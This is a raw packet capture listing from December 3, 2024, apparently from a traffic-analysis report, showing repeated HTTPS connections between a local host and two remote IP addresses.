                                                                        Dec 3, 2024 17:51:42.801678896 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:42.802387953 CET49948443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:42.802403927 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:42.803037882 CET49948443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:42.803044081 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:42.837418079 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:42.837867022 CET49949443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:42.837887049 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:42.838418007 CET49949443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:42.838423967 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.169378996 CET4434994713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.172621965 CET4434994713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.172673941 CET4434994713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.172692060 CET49947443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.172739029 CET49947443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.172806978 CET49947443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.172813892 CET4434994713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.172844887 CET49947443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.172849894 CET4434994713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.175687075 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.175713062 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.175796986 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.175930977 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.175941944 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.323510885 CET44349929142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:51:43.323590040 CET44349929142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:51:43.323653936 CET49929443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:51:43.338743925 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.341871023 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.341952085 CET49948443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.341985941 CET49948443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.342000008 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.342010975 CET49948443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.342015982 CET4434994813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.342859030 CET4434994613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.344891071 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.344912052 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.344989061 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.345128059 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.345139980 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.346035957 CET4434994613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.346091032 CET49946443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.346127033 CET49946443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.346132994 CET4434994613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.346172094 CET49946443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.346179962 CET4434994613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.348197937 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.348239899 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.348304987 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.348418951 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.348433971 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.350358963 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.353661060 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.353714943 CET49949443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.353785038 CET49949443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.353790045 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.353801012 CET49949443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.353805065 CET4434994913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.355731010 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.355741024 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.355813980 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.355969906 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:43.355979919 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:43.603538036 CET49929443192.168.2.4142.250.181.100
                                                                        Dec 3, 2024 17:51:43.603570938 CET44349929142.250.181.100192.168.2.4
                                                                        Dec 3, 2024 17:51:44.456856012 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.457544088 CET49950443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.457581997 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.458162069 CET49950443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.458173990 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.897819996 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.900914907 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.900984049 CET49950443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.901045084 CET49950443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.901058912 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.901072025 CET49950443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.901077032 CET4434995013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.905642986 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.905690908 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:44.905771971 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.905982018 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:44.905999899 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.113388062 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.114063978 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.114079952 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.114578009 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.114583015 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.229532957 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.230056047 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.230071068 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.230524063 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.230529070 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.232506990 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.232777119 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.232800007 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.233108997 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.233114004 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.314498901 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.315037012 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.315059900 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.315530062 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.315536022 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.581362963 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.584377050 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.584459066 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.584522009 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.584531069 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.584543943 CET49951443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.584548950 CET4434995113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.587289095 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.587333918 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.587399960 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.587565899 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.587580919 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.687053919 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.690120935 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.690201044 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.690238953 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.690258980 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.690272093 CET49952443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.690277100 CET4434995213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.690907001 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.693917990 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.693969011 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.693979979 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.694032907 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.694161892 CET49953443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.694180012 CET4434995313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.695630074 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.695672989 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.695750952 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.696293116 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.696310997 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.697865963 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.697906017 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.697983027 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.698133945 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.698149920 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.765219927 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.766207933 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.766267061 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.766335964 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.766345024 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.766356945 CET49954443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.766360998 CET4434995413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.769299984 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.769341946 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:45.769402981 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.769575119 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:45.769588947 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:46.771627903 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:46.772260904 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:46.772286892 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:46.773561954 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:46.773566961 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.225095987 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.225127935 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.225181103 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.225220919 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.225255966 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.225872040 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.225891113 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.225936890 CET49955443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.225944042 CET4434995513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.231587887 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.231632948 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.231725931 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.231889963 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.231903076 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.395057917 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.395550966 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.395576954 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.396034002 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.396039009 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.489573002 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.490255117 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.490273952 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.491641998 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.491647959 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.556240082 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.556955099 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.556976080 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.558303118 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.558307886 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.689691067 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.690227985 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.690244913 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.690849066 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.690854073 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.840594053 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.843543053 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.843622923 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.843682051 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.843694925 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.843705893 CET49956443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.843712091 CET4434995613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.846692085 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.846738100 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.846807003 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.846977949 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.846988916 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.934737921 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.935004950 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.935080051 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.935125113 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.935125113 CET49958443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.935142994 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.935153008 CET4434995813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.937922955 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.937954903 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:47.938034058 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.938205004 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:47.938216925 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.011987925 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.015662909 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.015718937 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.015782118 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.015783072 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.015858889 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.015858889 CET49957443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.015875101 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.015882969 CET4434995713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.018429041 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.018475056 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.018541098 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.018696070 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.018707037 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.147613049 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.150588989 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.150641918 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.150648117 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.150691986 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.150763988 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.150779963 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.150798082 CET49959443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.150804043 CET4434995913.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.154090881 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.154124022 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:48.154210091 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.154373884 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:48.154382944 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.044991970 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.045648098 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.045670033 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.046605110 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.046611071 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.576395988 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.577056885 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.577090979 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.577666044 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.577672005 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.583219051 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.583295107 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.583558083 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.583585978 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.583601952 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.583623886 CET49960443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.583628893 CET4434996013.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.586926937 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.586966991 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.587037086 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.587172031 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.587179899 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.809689999 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.810233116 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.810264111 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.810844898 CET49961443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.810851097 CET4434996113.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.814934969 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.815207958 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.815217018 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:49.815692902 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:49.815697908 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.015333891 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.015389919 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.015501976 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.015522957 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.015805006 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.015818119 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.015826941 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.015979052 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.016009092 CET4434996213.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.016057968 CET49962443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.018812895 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.018856049 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.018933058 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.019098043 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.019109964 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.080075026 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.083528996 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.083553076 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.083982944 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.083988905 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.270713091 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.273626089 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.273689985 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.273694992 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.273742914 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.273798943 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.273811102 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.273822069 CET49963443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.273828983 CET4434996313.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.276675940 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.276724100 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.276804924 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.276974916 CET49967443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.276987076 CET4434996713.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.601474047 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.601552963 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.601610899 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.601762056 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.601780891 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.601794004 CET49964443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.601799965 CET4434996413.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.604404926 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.604449987 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:50.604527950 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.604712009 CET49968443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:50.604729891 CET4434996813.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.376368046 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.377054930 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.377079010 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.377742052 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.377746105 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.810152054 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.811845064 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.811872005 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.812354088 CET49966443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.812360048 CET4434996613.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.821075916 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.821193933 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.821239948 CET4434996513.107.246.63192.168.2.4
                                                                        Dec 3, 2024 17:51:51.821264982 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.821294069 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.821533918 CET49965443192.168.2.413.107.246.63
                                                                        Dec 3, 2024 17:51:51.821557045 CET4434996513.107.246.63192.168.2.4
